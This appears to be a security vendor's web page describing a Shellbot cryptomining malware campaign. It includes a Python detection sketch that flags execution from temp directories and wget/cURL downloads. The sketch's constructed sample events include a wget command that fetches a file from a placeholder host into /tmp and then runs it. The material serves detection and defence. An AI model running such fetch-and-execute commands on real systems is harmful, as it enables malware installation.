Inside an Active Shellbot Cryptomining Malware Campaign

Threat Stack’s Security Operations Center (SOC) discovered and is monitoring an ongoing and evolving cryptojacking campaign that leverages a variant of the Shellbot malware. In one variant of the Shellbot campaign, Threat Stack identified the addition of a new SSH brute force tool, a secondary command and control method, and the added ability to stop other cryptominers on infected servers.


Overall, this is a sophisticated malware campaign that has been updated at least once during the investigation and will likely continue to be updated over time. The main goal of the campaign appears to be monetary gain via cryptomining and propagating itself to other systems on the internet. However, the possibility of data exfiltration and/or lateral movement cannot be discounted, as the malware appears to be capable of more than just cryptomining.

Do We Catch It? Yes We Do!

The current form of the campaign is detected by the Threat Stack Cloud Security Platform because it partially executes out of /tmp/ and downloads files via wget and cURL. It has been detected in both live customer environments and test environments, but how completely it is detected depends on which rulesets are enabled.
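As an added illustration of the two behaviours that detection keys on (not Threat Stack's own rules or telemetry), the following Python sketch flags process execution out of temp directories and wget/cURL downloads, and escalates when a file fetched into /tmp is executed shortly afterwards on the same host. The event records are constructed, and their field names are assumptions.

```python
import posixpath
from collections import defaultdict

SAMPLE_EVENTS = [  # constructed toy records, not campaign telemetry; field names are assumptions
    {"ts": 100, "host": "web-1", "exe": "/usr/bin/wget", "args": ["wget", "-q", "-O", "/tmp/.x/run", "http://a.invalid/run"]},
    {"ts": 104, "host": "web-1", "exe": "/tmp/.x/run", "args": ["/tmp/.x/run"]},
    {"ts": 200, "host": "web-2", "exe": "/usr/bin/curl", "args": ["curl", "-sS", "https://b.invalid/i.json", "-o", "/var/cache/i.json"]},
    {"ts": 300, "host": "web-3", "exe": "/usr/bin/python3", "args": ["python3", "/opt/app/srv.py"]},
]
TMP_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Flags that name the output file: wget uses -O (its -o is the log file), curl uses -o.
OUTPUT_FLAGS = {"wget": ("-O", "--output-document"), "curl": ("-o", "--output")}

def is_tmp_path(path):
    # Normalise first so "/tmp/../etc/x" is not mistaken for a temp path.
    return posixpath.normpath(path).startswith(TMP_PREFIXES)

def download_target(tool, args):
    """Explicit output path of a wget/curl command line, or None when implicit."""
    flags = OUTPUT_FLAGS[tool]
    for i, a in enumerate(args):
        if a in flags and i + 1 < len(args):
            return args[i + 1]
    return None

def classify(event):
    """Labels for one process event, plus the download target path if any."""
    labels, target = [], None
    exe, tool = event["exe"], posixpath.basename(event["exe"])
    if is_tmp_path(exe):
        labels.append("exec_from_tmp")
    if tool in OUTPUT_FLAGS:
        labels.append("network_download")
        target = download_target(tool, event["args"])
        if target and is_tmp_path(target):
            labels.append("download_to_tmp")
    return labels, target

def detect(events, window=300):
    """Per host: flag events; escalate when a file fetched into /tmp runs within `window` s."""
    findings, downloads = [], defaultdict(dict)  # host -> {normalised path: ts}
    for ev in sorted(events, key=lambda e: e["ts"]):
        labels, target = classify(ev)
        if "download_to_tmp" in labels:
            downloads[ev["host"]][posixpath.normpath(target)] = ev["ts"]
        if "exec_from_tmp" in labels:
            t0 = downloads[ev["host"]].get(posixpath.normpath(ev["exe"]))
            if t0 is not None and ev["ts"] - t0 <= window:
                labels.append("download_then_exec")
        if labels:
            findings.append((ev["host"], ev["ts"], labels))
    return findings
```

The benign curl to /var/cache still produces a low-value "network_download" label, which is the trade-off the text alludes to: coverage depends on which of these rules are enabled and how they are tuned.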

Threat Stack has been a great tool to have in our arsenal. We like the idea of sticking to our core business competencies - healthcare, healthcare marketing, and strategic planning - while being able to outsource or augment other things that are valuable but simply outside our area of expertise.

Brian Dailey
Co-founder and CTO


Including details of the malware components, the active cryptomining campaign flow, and future investigations.

Register for Webinar


A Threat Stack Security Analyst will walk through each step of the observed attack including the initial vector, malware campaign flow, and the actual log files and alerts triggered during the attack.

Read the Report